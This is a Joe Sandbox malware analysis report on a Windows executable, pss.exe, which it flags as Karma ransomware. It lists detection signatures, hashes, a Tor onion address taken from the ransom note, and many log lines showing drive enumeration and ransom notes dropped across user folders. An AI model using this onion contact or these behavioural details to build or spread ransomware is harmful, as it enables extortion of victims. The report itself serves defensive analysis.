Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report pss.exe

Overview

General Information

Sample Name:pss.exe
Analysis ID:467911
MD5:56700917a7434e307531195e4102d7bf
SHA1:b396affd40f38c5be6ec2fc18550bbfc913fc7ea
SHA256:3ff1b90dbad5d78397fdc731c3a3c080d91fc488ac9152793b538b74a1e2d8f3
Infos:

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
May encrypt documents and pictures (Ransomware)
Found Tor onion address
Writes many files with high entropy
Writes a notice file (html or txt) to demand a ransom
Modifies existing user documents (likely ransomware behavior)
Uses 32bit PE files
One or more processes crash
Detected potential crypto function
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • pss.exe (PID: 3296 cmdline: 'C:\Users\user\Desktop\pss.exe' MD5: 56700917A7434E307531195E4102D7BF)
    • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

  • AV Detection
  • Compliance
  • Spreading
  • Networking
  • Key, Mouse, Clipboard, Microphone and Screen Capturing
  • Spam, unwanted Advertisements and Ransom Demands
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Anti Debugging
  • HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: pss.exeVirustotal: Detection: 49%Perma Link
Source: pss.exeReversingLabs: Detection: 45%
Source: pss.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\pss.exeFile opened: z:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: x:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: v:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: t:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: r:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: p:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: n:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: l:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: j:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: h:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: f:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: b:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: y:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: w:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: u:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: s:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: q:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: o:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: m:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: k:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: i:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: g:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_00402D30 CreateFileW,WriteFile,FindCloseChangeNotification,FindFirstFileW,FindNextFileW,FindClose,0_2_00402D30
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\3D Objects\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Adobe\Jump to behavior

Networking:

barindex
Found Tor onion address
Source: KARMA-ENCRYPTED.txt68.0.drString found in binary or memory: http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/
Source: KARMA-ENCRYPTED.txt68.0.drString found in binary or memory: http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_00402320 GetTempPathW,GetProcessHeap,HeapAlloc,CreateFontW,GetDC,CreateCompatibleDC,SelectObject,GetTextExtentPoint32W,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,GetPixel,SetPixel,SetPixel,SetPixel,SetPixel,SetPixel,ReleaseDC,CreateFileW,WriteFile,WriteFile,WriteFile,WriteFile,CloseHandle,DeleteObject,DeleteObject,DeleteDC,DeleteObject,GetProcessHeap,HeapFree,SystemParametersInfoW,0_2_00402320

Spam, unwanted Advertisements and Ransom Demands:

barindex
May encrypt documents and pictures (Ransomware)
Source: C:\Users\user\Desktop\pss.exeFile created: c:\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\3d objects\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\3d objects\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\collab\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\collab\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\forms\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\forms\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\jscache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\jscache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\security\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\security\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\security\crlcache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\acrobat\dc\security\crlcache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\flash player\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\flash player\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\flash player\nativecache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\flash player\nativecache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\headlights\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\headlights\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\linguistics\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\linguistics\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\logtransport2\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\adobe\logtransport2\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\addins\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\addins\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\bibliography\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\bibliography\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\bibliography\style\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\bibliography\style\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\credentials\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\credentials\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\document building blocks\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\document building blocks\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\document building blocks\1033\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\document building blocks\1033\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\document building blocks\1033\16\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\document building blocks\1033\16\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\excel\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\excel\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\excel\xlstart\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\excel\xlstart\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\user pinned\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\user pinned\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\user pinned\taskbar\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\quick launch\user pinned\taskbar\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\userdata\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\userdata\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\userdata\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\internet explorer\userdata\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\mmc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\mmc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\connections\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\connections\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\connections\pbk\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\connections\pbk\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\connections\pbk\_hiddenpbk\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\network\connections\pbk\_hiddenpbk\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\office\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\office\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\office\recent\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\office\recent\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\proof\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\proof\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\protect\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\protect\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\protect\s-1-5-21-3853321935-2125563209-4053062332-1002\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\protect\s-1-5-21-3853321935-2125563209-4053062332-1002\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\speech\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\speech\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\spelling\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\spelling\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\spelling\en-us\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\spelling\en-us\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\certificates\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\certificates\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\crls\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\crls\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\ctls\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\systemcertificates\my\ctls\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\templates\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\templates\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\uproof\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\uproof\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\vault\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\vault\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\word\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\word\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\word\startup\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\application data\microsoft\word\startup\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\contacts\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\contacts\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\dntexception\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\dntexception\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\dntexception\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\dntexception\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\ese\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\ese\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\low\ese\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\low\ese\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\privacie\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\privacie\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\privacie\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\cookies\privacie\low\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\bnagmgsplo\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\bnagmgsplo\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\duudtubzfw\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\duudtubzfw\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\gaobcviqij\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\gaobcviqij\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\nymmpceima\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\nymmpceima\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\pwccawlgre\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\pwccawlgre\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\qcfwyskmha\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\qcfwyskmha\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\sqsjkebwdt\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\sqsjkebwdt\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\tqdfjhpuiu\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\tqdfjhpuiu\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\zggknsukop\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\desktop\zggknsukop\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\bnagmgsplo\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\bnagmgsplo\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\duudtubzfw\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\duudtubzfw\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\gaobcviqij\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\gaobcviqij\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my music\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my music\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my pictures\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my pictures\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my pictures\camera roll\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my pictures\camera roll\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my videos\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\my videos\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\nymmpceima\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\nymmpceima\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\pwccawlgre\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\pwccawlgre\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\qcfwyskmha\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\qcfwyskmha\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\sqsjkebwdt\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\sqsjkebwdt\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\tqdfjhpuiu\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\tqdfjhpuiu\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\zggknsukop\karma-encrypted.txtJump to behavior
